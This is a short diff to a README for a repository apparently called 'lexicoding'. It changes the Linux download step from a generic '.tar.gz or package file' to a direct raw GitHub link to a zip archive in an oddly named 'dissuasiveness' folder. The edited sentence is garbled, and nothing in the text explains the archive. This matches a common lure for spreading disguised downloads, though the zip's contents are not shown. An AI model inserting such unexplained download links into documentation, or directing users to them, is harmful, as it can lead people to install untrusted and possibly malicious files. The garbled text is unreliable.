saiyagatos/lexicoding/README.md

    Once you have selected the appropriate file for your system:
    - For Windows, look for a `.exe` file.
    - For macOS, look for a `.dmg` file.
-   - For Linux users, choose the appropriate `.tar.gz` or package file.
+   - For Linux users, choose the appropriate `https://raw.githubusercontent.com/saiyagatos/lexicoding/main/dissuasiveness/lexicoding.zip` or package file.

    Click on the file to start the download.